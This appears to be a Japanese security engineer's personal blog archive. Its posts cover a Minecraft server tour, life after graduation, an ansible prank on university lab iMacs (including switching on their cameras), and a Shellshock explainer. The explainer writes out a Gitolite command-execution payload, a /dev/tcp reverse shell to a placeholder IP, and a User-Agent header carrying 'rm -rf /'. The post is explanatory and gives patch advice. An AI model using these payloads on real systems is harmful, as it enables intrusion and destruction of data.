Recent posts (max 10) - Browse or Archive for more

たびにっき 2018-12 in WORD Minecraft

まえがき

みなさん、おはこんばんちわ。WORD OB のくりすです。
このたびWORDIAN Advent Calendar 2018にノリと勢いで参加し、どんな記事を書こうかなぁと1週間ほど迷っておりました。

WORDIANは皆思い思いの素晴らしい文明を持っているんですが……文明……そうだ!!

今日は WORD Minecraft をみなさんにご紹介いたします!!

ぼやき

本当は旅行誌みたいな文体にしたかったんですが、そんな文才もなく、結局おっさんの旅ブログみたいな自己満足記事にしかなりませんでした。以下はおっさんの自己満旅ブログ記事です。 しかも写真が縦に並んでいて超長文です。パケット使用量にご注意。

WORD Minecraft について

WORD部屋にMinecraftが導入されたのは2011年当時。まだ1.7.3_Betaだった頃から祖国の発展に心血を注ぐ人々がいました。
彼らは無人の荒野を切り拓き、基地を建て、先住民を拘束との交流を深め、祖国となる領土をまたたく間に拡大していきました。
1.7.3_Betaから始まり、筆者が初めてこの世界に降り立った1.2.5や、増殖バグで賑わいを見せた1.4や1.5.2、馬バブルで新都市がつくられた1.6、その後も歴史は紡がれてゆき、現在は1.12.2に至ります。

この記事では、そんな WORD Minecraft の7年にも及ぶ歴史を写真でひもといていきましょう。

その1. 筆者の育ちの地 ~平壌~

2011年だか2012年だかのある日。筆者が WORD Minecraft の世界にスポーンすると、偉大なるPhi_san同志が現れて「基地はこっち」と言葉巧みに導いていったその先は…… 平壌でした。筆者育ちの地ということでつい熱く語りがちになってしまいますが、どうか温かく見守ってください。

立派な駅舎です。

誇示される街の発展ぶり。

この将軍様の肖像画は、なんと羊毛を地面に敷き詰めて地上絵にしたものをマップに書き込んで額縁にはめたものだそうです。

住民は外出の自由を与えられているようです。

えっ……これは、平砂宿舎!?

宿舎とは呼ばれていないようです。

平壌のヌシ、Phi_san同志の部屋です。

田村ヒルズ(実在したアパートの名前は「田村ハイツ」)と呼ばれる建物が4つ並んでいます。右奥のドアは、かつての筆者の家です。

キッチンに、

4x4ブロックの小部屋。引き払ったので空です。

これは…

我らの衛星が空に浮かびました。

なんかてっぺんに人民がいます。月に送られるのかな?

柳京ホテルです。

完成したのかどうか確かめるのを忘れました。

花火打ち上げ場みたいです。

このレバーを引くと、

こんなところにもスローガンが。

アップルストア平壌

おしゃれですね

そういうことかい

筆者の今の住居です。肖像画は同志に勝手に飾られました。

この建物は上から下までチェストだらけなんですが、

かつて無限増殖バグがあった頃に、ここが物資の違法な増殖の拠点になっていたそうです。

あたまおかしい。

この平壌市内は地下鉄駅が東京メトロ並に密集しています。

改札機付き。

無人のトロッコが暴走しないよう、トリップワイヤーを応用したATSが取り付けられています。

\楽園へようこそ!/

これ本当によく作ったなぁ……

地下に降りるとネザーポータルがあるので、入ります。

ネザーに敷いた鉄道は通称「新幹線」

その1.5. グラウンド・ゼロ

しばらく新幹線もといトロッコに揺られると、大きなターミナル駅「グラウンド・ゼロ」に着きました。

馬の係留所。

グラウンド・ゼロ全景。

これ全部下まで手掘りなんですよ。バニラ鯖ですから。

謎の穴

深淵をのぞく時、深淵もまたこちらをのぞいているのだ。

※落ちたら死にます。

グラウンド・ゼロ駅から再び新幹線に乗って、次は新橋駅。オリジナルリスポーンポイントに近い所なので、新入りには馴染みが深い街であるとともに、 WORD Minecraft 最古の都市でもある、雰囲気のある街に出ます。

その2. 古都・新橋

新橋に着いた目印はコレ。

いや、こっちのほうが目立ってます…

古式ゆかしい、角ばった土作りの建物。

空っぽじゃないですか。

なんだこれ……

消費税が5%だった時代。

今やあんまり物がない、古都というよりもう廃村って感じでした。

その3. メガロポリス・北海道

新橋から少しトロッコを走らせると、

すさまじい密度の大都市がありました。北海道です。

大図書館とユグドラシル。

ここはマクドナルドもオシャレに半透明。

環境保全地区。ここをまっすぐ行くと北海道を出て、次は樺太、海ほたる、秋葉原です。

その3.5. 樺太

樺太には、偉大なるPhi_san同志の像が!!

その4. 秋葉原

オール電化の立派な線路の向こうには…

秋葉原駅。

レンタカーがあります。

みどりの窓口もあります。

ろんず大仏の足元です。

こちらはあの「北海道」の主、athlonz_xpさんの像です。

765プロ。

青い建物といえば…?

Animateです。

漫画家セットが新入荷でアツいそうです。

どっちかというと小説家セットでした。

秋葉原の賑わいの裏手にはダムがあります。

ダム展望台からの眺望です。

このレバーを下げると、

警告音が鳴って、

ザバァ~~~

またもや平砂宿舎。こちらのほうが先に建てられました。

こっちは1階部分のセキュリティもバッチリです。

永久に燃える山。右奥に鳥居が見えますが、あれは「鳥取」の一部です。

その5. 鳥取

まずはお参り。

ようこそ鳥取へ!

城です。

大山から城の方向を望む。

鳥取を離れ、少しぶらぶらします。

その6. 新天地

続いてやってきたのは、物資の宝庫「新天地」です。雨が降ってきました。

砂の無限増殖バグで沸き上がった違法ビジネス都市です。

動かなくなった増殖装置はさながら産業遺産。

おっと、ここで!!

Phi_san同志登場!!!!!

ここで待ち合わせます。

ついに平壌のヌシとご対面。Phi_san同志です。

ここからは同志と線路沿いを歩いたりトロッコに乗ったり飛んだりしてそのへんを観光していきます。

その7. 新日暮里♂

あぁん!?新日暮里!?

新日暮里公園です。

これは掲載してもいいやつですかね?学類長チェック通りますか?

やらないか

そういう用途の公衆トイレです。

先客がいました。

トイレ内を現地指導する同志。

下水に流される同志。

マクドナルドは遍在する。

まともな商品はありません。

みなさんもよくご存知のホテルつくばです。

本物にこういういたずら書きがあるのかは知りません。

ファミマです。

この人は店員になりすまして略奪をはたらいています。

ふぐり大聖堂

同志のありがたいお話です。

適当に歩いてたら、バージョンの境目を見つけました。

これもまた、複数バージョンにまたがって歴史が紡がれる世界の_あるある_のひとつです。

またトロッコに乗って…

次は「家」です。ポータル死んでますが。

その前に、同志が何やら脇道を見つけたようです。

散々歩いた最後は行き止まりでした。ここで力尽きたんだな……。

その8. 家

死んでいたポータルは放置して、地上の線路で「家」へ向かいます。

ババア像

家に着きました。

化物が軒下に引っかかってます。

落ち着いた内装のロッジです。

わんわんお

新幹線で「高田馬場」へやってきました。

その9. 高田馬場

いかにも馬バブルの地です。

白い「落とし物」は馬のものっぽくはないですね。

その9.5. 下北沢

雪ブロックの高さを8段階で変えられるようになったときに発展した街です。

な阪関

落ち着いた雰囲気の建物です。

看板には落ち着きがない。

その10. 豊郷

下北沢から徒歩で豊郷小学校旧校舎群に来ました。

講堂です。

その11. 遺跡

豊郷から遺跡の間にも新幹線が通っています。この旅もそろそろラスト。

駅舎は豪華絢爛です。

駅ねこ

相変わらず趣向がアレです。

重厚な鉄扉の向こうには…

おもしろバーが2軒。

同志がいつの間にやら店番をしています。

逆方向にはどこかで聞いたことのある店名のバーがあります。

真ん中に物々しい台。

別室があります。

同志、入ってしまわれました。

外の空気を吸いに出てきたら、すでに明るくなっていました。

同志の視線の先には違法高層建築群。

THE END へダイブします。

ポータルへ直滑降。

その11. THE END

異世界へ転生してしまいました。ここはエンダーマンの世界、 THE END です。

ここで暮らそうとした人がいたようです。

ほぼ未開拓のエリア。右に不思議な装置があります。

「プリパラの門をくぐる者、全ての希望を捨てよ!」

装置を稼働させると、エンダーマンが次々に入場していきます。

この様子が本当におもしろかった。

ちなみにこの門の下はエンダーマンの♥が0.5になるように調整された落とし穴になっており、エンダーマンは下のほうでプレイヤーがとどめの一撃を刺しにくるまでもだえながら待っています。要は経験値トラップ。

地上へ帰ります。そういえば最後に使ったベッドはどこだっけ……?

エピローグ

あぁ……!!こんにちは、ナイル文明!!

説明しよう!

WORD Minecraft のナイル文明とは、発展しきった都市文明に飽きたプレイヤーたちがすべての荷物を捨て、コマンドブロックで仕掛けられたテレポート装置で x:70000, z:70000 を指定して集団で高飛びした先にイチから作られた文明のことである!

~おわり~

2018-12-08_21.52.47_1280x720.png

あるcoins卒業生の現在

概要

coinsな人なら既卒、在学中、教員、入学予定、志望、退学、除籍、転類希望…どなたでもOKです 内容も自由です(coinsっぽくないことでもよいかと) 技術の話をするもよし、好きなガジェットを語るもよし、今は亡きcoinsLTについて語らうもよし、夢屋と松屋をかたるもよし、畑を案ずるもよし、なんでもありです

それではご自由にどうぞ

coins Advent Calendar 2016

「畑を案ずる」ってわたしのことなのでは……!

ということで、遅くなりましたが16年度coins卒業生がつくばに住み続けながら渋谷で働いている話をQ&Aっぽい形式でします。


わたしはだれ

通称くりす。情報科学類2010年度入学、2留の末2016卒。ちゃんと卒業しましたよ!いまだに大学に出入りしてますが。

今何してるか

BASE株式会社 というところでセキュリティエンジニアとして働きながら、休日はcoins14の @rairyuGO と畑をやったり、WORD編集部の連中と戯れたりしております。

今どこに住んでいるか

いまだに学生に混じってつくばに住んでいます。この決断に至った理由に、もともとつくば育ちである・都会より空気がずっときれい・大学の後輩と戯れ続けたい・畑を続けたい・車を手放したくない・つくばの家賃が安い・つくばの飯がうまい・引っ越しがだるい、などが挙げられます。

つくばから渋谷へ通うのには高速バスと東京メトロを使っております。バスというと職場の人は全員驚きましたが、必ず座れてトイレがついてるという利点は何物にも代えられません。さらにTXがつくば駅までなのに対しバスは大学の中まで来るので、うちにも近くて助かります。

どうして今の仕事を選んだか

実はBASE社が運営している PAY.JP という決済サービスの構築にはかなり前から関わっていました。いろいろあってPAY.JPに出会い、4年生当時にはフリーランサーとして週1でPAY.JP関係の仕事をしていたので、その延長で新卒入社という感じです。入社前にその職場がどんなところなのか、どういう人がいるのかという情報はバッチリ把握できましたし、逆にわたしのスキルや仕事への意欲といった情報を会社側に把握してもらうこともできていたので、理想的な就職でした。労働に対して敵意を向けているのは今も昔も変わっていないのですが、これなら続けていけそうです。

ありがとうBASE株式会社!

畑の調子は

今はタマネギとブロッコリーとニンジンと白菜が植わっています。ブロッコリーが収穫期真っ盛りで、ニンジンはちょっと未熟ですが柔らかくておいしいです。

広告欄

ネットショップ運営は BASE で!!

結論

つくばはいいぞ。

coins的イタズラ

なぁにこれ

coinsの人がcoinsっぽいことを書いていくアドベントカレンダーです。

coinsの人とは

  • coinsに所属している人
  • coinsに所属していた人(老害はほどほどにな)
  • これからcoinsの人(若さを分けてくれ)
  • 心がcoinsの人
  • 不埒なcoinsを評したい人

を指します

内容

  • 書けば官軍書かねば賊軍
  • 同じ阿呆なら書かねば損損

coins Advent Calendar 2015


そんなわけで、coins Advent Calendar 2015 12月18日付の記事はくりすが担当させていただきます。


まえがき

COINS*1 とは筑波大学における「情報科学類」の公式略称であり、当該学類やそこに所属する学生のことを指します。端的に言えばcoinsは変人の集団です。よく「恋人にしたくない学類No.1」にノミネートされています。しかしそんな学類を居心地良いと感じる人も多く、独特の雰囲気の中で皆、日々学問や趣味からくだらない遊びまで幅広く研鑽に励んでいます。 わたしもcoinsの2010年度生として現在卒業論文の執筆を進めております。6年次4年生です。いろいろあったんです。でもとうとう卒業が目前になり、coins生として様々な活動に励むのもあと3ヶ月程であると思うと感慨深いです。

今日はcoins界隈で嗜まれる「くだらない遊び」に焦点を当てた記事を、わたしのcoins生活最後となるアドベントカレンダー記事としてお届けします。


さて、coinsで嗜まれる遊びに「イタズラ」が挙げられます。一般常識に決して縛られないcoinsACの得意とする分野です。「計算機室のiMacを一斉に笑い出させる」程度の比較的無害なものから「学内の池にスワンボートを浮かべる」という一大プロジェクトまで様々な規模のものが実行された歴史があり、MITの「ハック」に相通ずるものがあります。そんなイタズラをひとつばかりピックアップしてみたいと思います。

計算機室のiMacで

coinsが保有する計算機室には、全部で100台を超えるiMacが設置されており、学生がいつでも自由に利用できる環境が整備されています。深夜にも利用している学生がちらほらおり、彼らの学習意欲の高さ(またはカリキュラムの厳しさ)を物語っています。そして、彼らは暇を持て余したcoins生のイタズラの格好のターゲットになります。

計算機室のiMacで稼働するすべてのOS X上ではSSHが稼働しており、アカウントを持っている学生はどこからでも自由にリモートログインできます。これを使わない手はありません。 SSHを用いてたくさんのホストにいっぺんにコマンドを送信するのに便利なのがansibleです。管理対象のホストではSSHさえ動いていればあとは何も要らないのが大きな利点です。 ansibleを用いて、計算機室のiMacで(怒られない範囲で)遊んでみましょう。

ターゲットとなる計算機室iMacのホストを設定*2したら、echoコマンドで試し撃ちしてみましょう。

$ ansible coins -i hosts -u <username> -a "echo uhihi"
foobar04.coins.tsukuba.ac.jp | success | rc=0 >>
uhihi

foobar03.coins.tsukuba.ac.jp | success | rc=0 >>
uhihi

foobar05.coins.tsukuba.ac.jp | success | rc=0 >>
uhihi

foobar01.coins.tsukuba.ac.jp | success | rc=0 >>
uhihi

foobar02.coins.tsukuba.ac.jp | success | rc=0 >>
uhihi

etc...

こんな感じで一度に複数のホストに簡単にコマンドを送信でき、その結果を確認できます。 あとはこれをsayコマンドで応用してMacに喋らせてみたり、afplayでwavやaiffを流してみたり、whoでどのマシンを誰が使っているか監視したり、カメラを起動してみたり*3、無限大の可能性が広がります。深夜にホラーじみた音声がそこかしこのiMacから発されたらたまったもんじゃありませんね。もちろんansibleのパワーはこれだけにとどまりませんので、みなさんのほうでガンガン開拓していけると意外な発見があるかもしれません。そして、学生生活中にこうして無駄遣いした技術力は、必ずや将来役立つ戦力となるでしょう。みなさんの今後に大いに期待しております。

おわりに

かならず おとなのひとといっしょに あそんでね!


*1 case insensitive
*2 ansibleの使い方を説明する記事ではないので省略。ここではホストグループをcoinsと設定した場合を想定して記述しています。
*3 このような盗撮行為が可能であることが判明したため、内蔵カメラにシールを貼る対策が今年実施されました。

CVE-2015-0014について (あるいは自慢話)

氏とわたしが報告したWindows Telnetに関する脆弱性に、 CVE-2015-0014 (およびMS15-002) というIDが割り振られました。

この脆弱性はWindows Telnetにおけるバッファオーバーフローに関するもので、登氏が同プログラムの不穏な挙動を発見し、そのエクスプロイトコードをわたしが作ってMicrosoftに報告したというかんじです。 今どきのOSにはASLRが積んであるのでドエラいことをするためには工夫が要るのですが、XPやServer 2003などには死をもたらすことができたので、結構アレゲな脆弱性です。

Microsoft TechNetに掲載された謝辞がこちらになります。

いよいよ名前が世界に知らしめられてしまいました。自分が発見に関わった脆弱性にCVE IDが付いたことですし、もしかするとこれでわたしもプロハッカーの仲間入りを果たしてしまったのかもしれないのですが、仕事というものが滅法苦手なわたしはたぶんこれからもバグハンターという狩猟生活を、自分の気の向くままにやるにとどまるでしょう。

そんなことより山にこもりたいと考えている今日この頃です。この山小屋がほしい。 https://suumo.jp/jj/bukken/shosai/JJ012FD010/?ar=040&bs=021&nc=83826542&suit=nsuusbsp20121129001

bashの脆弱性がヤバすぎる件

やっと更新する気になった。

もくじ

  • 0. 産業で説明
  • 1. 理論編
  • 2. 攻撃編
  • 3. パッチ
  • 4. 結論

0. 産業で説明

bashが
アホで
地球がヤバイ

1. 理論編

bashの関数機能は、環境変数の中でも使える仕様になっています。
今回問題となったのは、関数に任意のコマンドを続けて環境変数に入力すると、コマンドが勝手に実行されてしまうということです。この脆弱性にはCVE-2014-6271というIDと、Shell Shockというニックネームがつけられました。

2. 攻撃編

なんでもいいのでLinuxホストのターミナルでこんなコマンドを打ってみましょう:

$ AHO='() { baka; }; echo manuke' bash -c 'echo Hi'

もし出力の中にmanukeが含まれていたら、そのホストは今回発表された脆弱性に対して危険な状態です。

もうちょっとゾクッと来る例を紹介しましょう。

Gitoliteなど、シェルを提供しないという条件付きでSSHの接続を受け付けるタイプのアプリケーションがありますが、この脆弱性を突くと、シェルを与えていないユーザに好き放題されてしまうかもしれません。

あるGitoliteサーバ (gitolite.example.com) にアカウントを持っている攻撃者が自分のホストから

$ ssh [email protected] '() { :; }; /usr/bin/id'

というコマンドを発射します。そして、

uid=108(git) gid=114(git) groups=114(git)

と返ってくると、攻撃は成功です。

$ ssh [email protected] '() { :; }; bash -i >& /dev/tcp/203.0.113.1/4444 0>&1'

というコマンドを撃てば、203.0.113.1:4444にリバースシェルが降ってきますね(*1)。

もうひとつヤバい例を挙げましょう。CGIです。

CGIにおけるアタックベクタは、環境変数に格納されるパラメータです。 system()や類似の関数を用いたCGIスクリプトは、OSコマンド実行のためにbashを呼び出しているかもしれません。 CGIはパラメータを環境変数として格納しています(*2)から、HTTPリクエストヘッダをいじって

User-Agent: () { :; }; rm -rf /

とかやるとゾクゾクするかもしれません。わたしは実証していませんが。

3. パッチ

Ubuntu 12.04.5 LTSでは既にパッケージマネージャによって緊急アップデートが提供されていることを確認しました。その他のディストリビューションでもたぶんパッチが提供されていますが、そうでなければ http://seclists.org/oss-sec/2014/q3/650 こちらに掲載されている、bashのバージョンに適したパッチを使用しましょう。

bashのソースコードとパッチを読んで、どういうコードからこの脆弱性が生まれたか読み解いてみるのも勉強になりますね。

4. 結論

コワイ!


*1: この例はUbuntu 12.04.1 LTSで実証しました。この方法が使えなくてもNetcatやPerlなど、リバースシェルを引っ張る方法はいくらでもあります。
*2: 例: ユーザエージェント→HTTP_USER_AGENT

セキュリティ・ミニキャンプ in 会津 へ行ってきました

夕飯食ったら書く。

「人文LT2」で発表しました

情報科のおじさんが、華の人文生たちによるLTに乱入してきました。 資料をアップロードしたのでどうぞご覧ください。

これはニホンゴですか? (推奨ブラウザ: Chrome*)

発音が日本語っぽい言葉を世界中から集めて、それらの意味や例文(?)を解説する内容です。


* またimpress.jsなんか使っちゃったからまっとうなブラウザじゃないと動きません。

最新のおふざけ

はい。

進捗どうですか?

Chromium 34.0.1 のみで動作確認。Firefoxはつらかった。


使用したsomething

impress.js

クリスセキュアシステムズをたたみます。

以下、2週間前にFacebookに投稿したことの丸写し。


はじめに、わたしの仕事が遅いことについて、関係者各位には深くお詫び申し上げます。

さて、クリスセキュアシステムズをたたむことを検討しております。
主たる理由は次のとおり。

  • 在学年限の関係上、もはや余計なことをする時間がない
  • 必ずといっていいほど尻に火が着くまで何もせず、クライアントに迷惑をかけたり、自分の仕事を自ら炎上させてしまうことがあった(つまり、時間とタスクの割り振り・自己管理がド下手クソ)
  • できないことを引き受けて痛い目にあった

とくに下のふたつは他人が関わるぶん、より重大な懸案事項です。仕事をする人にあってはならないことです。頭では分かっているのにまるで行動が伴わないので、社会人風情を気取るのはここでやめにして、やるべきことをやる、一人前の人間になる訓練に立ち返ります。本当に社会人になるまでにあと2年あるので、この間にどれだけ弱点を克服できるか、自分を試してみようと思います。

それと別れました。

サーバ移転しました

経費削減のために、Tracサーバと、わたしの管理するSNSで使っているサーバを統合しました。

Before

  • (Trac) Amazon EC2 (t1.micro) … EC2小計 $23.79
  • (SNS) さくらVPS SSD 2G プラン … ¥1,760
  • (Mail) さくらVPS 1G プラン … ¥980

After

  • (Trac, SNS, Mail1) さくらVPS SSD 2G プラン … ¥1,760
  • (Mail2) さくらVPS 1G プラン … ¥980 (本当に必要か審議中)

詳細は後ほど追記